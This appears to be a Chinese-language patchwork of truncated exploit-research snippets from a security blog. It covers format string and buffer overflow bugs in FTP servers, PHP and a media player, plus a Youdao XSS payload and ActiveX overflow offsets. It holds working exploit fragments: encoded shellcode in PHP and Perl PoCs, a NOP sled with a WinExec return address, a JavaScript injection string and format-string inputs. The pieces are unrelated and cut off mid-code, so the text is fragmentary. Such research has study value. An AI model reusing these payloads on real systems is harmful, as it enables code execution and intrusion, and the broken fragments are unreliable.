mona是一个为Immunity Debugger编写的插件，功能十分强大，可以帮助exploit编写人员快速找到想要的指令序列以及很多实用搜索内存的功能。其中有生成egg hunter代码的功能，默认生成结果如下

================================================================================
  Output generated by mona.py v1.1
  Corelan Team - http://www.corelan.be
================================================================================

环境为XP SP3 cn(x86) Office 2003

信息和原版POC来历：http://sebug.net/exploit/23168/

版本：Quick easy ftp server 4.0.0（其他版本未测试）

测试：W2K SP4

Quick easy ftp server 4.0.0 未安全使用wsprintfA函数进行字符串操作，导致格式化串漏洞。受影响的命令包括LS, CD，USER等。其中，USER命令不需要拥有合法的账户。

以下是简短的分析：

对于提交用户名：%x%x%x%x%n

读取参数时的栈布局如下：

0012FCC0   011652E8  ASCII "02/10/2011 22:33:20.2

地址：http://www.youdao.com/

功能：搜索

搜索关键字：\x27,x:alert(\x27hello\x27)}])//

漏洞成因：有道将用户搜索过的关键字保持在Cookie youdao_search_history_websearch中，采用^分割。在而后的使用中装入JSON字符串，由于没有过滤字符\导致对单引号的转义绕过过滤，在后来使用eval解析JSON字符串时执行恶意JS代码。

bug #54238 (use-after-free in substr_replace()). (CVE-2011-1148)

很惭愧，本人水平太有限，没有找到利用手法，呵呵。这里构造一个会Crash的样本以及分析过程，希望对读者有所帮助。

$ArrTest = Array();
$ArrTest[0] = "FUCKYOU,BABY!";
substr_replace($ArrTest, $ArrTest, $ArrTest);
分析：
011ED278  19 00 00 00 11 00 00 00 E8 EC 1E 01 48 EC 1E 01  ... ...桁 H?
011ED288  04 00 00 00 04 00 00 00 19 00 00 00 19 00 00 00  ... ... ... ...
011ED298

<?php
//////////////////////////  PHP 5.3.5 phar format string POC(Win32)
///////////// PHP "phar/phar_object.c" format string Vulnerability  -->see http://sebug.net/vulndb/20375/
///////////// Exploit by ylbhz@hotmail.com
///////////// TEST in (Win32) PHP/5.3.5 On WinXP sp3
///////////// Payload windows/exec {CMD=calc, Encoder=x86/alphamixed}
$shellcode = "".
"\x89\x

#!/usr/bin/perl
# Exploit Title: yahoo! player 1.2  (.m3u) Buffer Overflow
# written by ylbhz
# Software website: http://www.clubic.com/
# Version: 1.2.00.409
# Tested on: Windows 2k adv sp4 cn
# CVE : N/A
# Greets to: D3r K0n!G (POC) in page:http://sebug.net/exploit/20913/

my $shellcode = "".
"\x89\xe5\xd9\xc2\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43".
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x5

//buffer[40] overflow
unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"

"\xc2\xc0\xe7\x77"
/*
0x77e7c0c2(kernel32.dll) :
  ADD AL,CH
  MOV ESI,5DFFFFFE
  RETN 28
*/
"\x1d\x9c\xe6\x77"  //0x77E69C1D WinExec in kernel32.dll
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x9

Easy File Sharing FTP Server 是一款操作简单，功能齐全的FTP服务器软件，其最新版本（至2.11.8.24)在日志文件中明文记录用户登录的密码和用户名。默认情况下（NTFS文件格式）对日志目录的权限设置如下：

C:\>cacls "C:\Program Files\Easy File Sharing FTP Server\log"
C:\Program Files\Easy File Sharing FTP Server\log BUILTIN\Users:R
                          

众所周知的从XP开始T.E.B不在是固定的地址，这给ret2lstrcpyA攻击带来了致命的威胁，今天使用7FFDEC04作为参数在我自己的xp sp3上攻击成功率只有20%左右，用如下代码测了下，发现一个有趣的统计结果

printteb.exe

#include <stdio.h>
#include <windows.h>

void main(int argc, char* argv[])
{
 DWORD dwTEB = 0;
 __asm
 {
  push eax
  mov eax, fs:[0x18]
  mov dwTEB, eax
  pop eax
 }

虽然最终没有实测利用成功，只是调试器测试成功（不是调试态的原因，后面会分析）。但是还是提供了一个分析和利用Windows平台下格式化串漏洞的基本思路，希望对和我一样的小菜有所帮助。

漏洞示例代码
#include <stdio.h>

int main(int argc,char* argv[])
{
 if (argc != 2) return -1;

 printf(argv[1]);

 return 0;
}

AAAAAAAA%.8X-%.8X-%.8X

AAAAAAAA00401105-00000002-00410E80

0012FF80   00410EBA  ASCII "AAAAAA

        这个方法很鸡肋，需要服务器有编程环境，mswinsck属于VB控件，装了VC或者VS也行，否则是没有注册的。作为一种思路吧。

        MSWINSCK.OCX里的方法可以用来主动连接，但是可能由于本人的ASP功底不够吧，始终没有实现使用Connect方法探测任意IP地址的端口，希望有高人能够写出来代码并能共享出来。

测试环境：Windows 2003 企业版 SP2  IIS 6.0

测试代码：

<%
Function CheckLocalPort(intPort)

#include <stdio.h> // printf(), fprintf(), stderr
#include <stdlib.h> // exit(), EXIT_SUCCESS, EXIT_FAILURE, srand(), rand()
#include <string.h> // strcasecmp(), strstr()
#include <time.h> //struct timeval, struct timezone, gettimeofday()
#include <windows.h>
#define VERSION_STRING "ALPHA 2: Zero-tolerance. (build 07)"
#define COPYRIGHT      "Copyright (C) 2003, 2004 by Berend-Jan Wever."
strcasecmp (const char

测试漏洞为COMRaider下面的测试文件vuln.dll，安装了COMRaider的朋友可以在安装目录下找到，并用regsrv32 vuln.dll注册。下面是两个测试代码和一点简单分析

（1）用vbs调用的测试

字符串头 0012ECA0   41414141
esp：    0012ED78   41414141
将要执行的代码:retn 0C
取消所有断点，在retn 0C处下断点
0x0012ED78 - 0x0012ECA0 = 0xD8 = 216

测试 216 nop + 0x90 x 4
注意vbs中使用ascii码 0x90 = bchr(144)

返回地址jmp esp要禁得住宽字节转换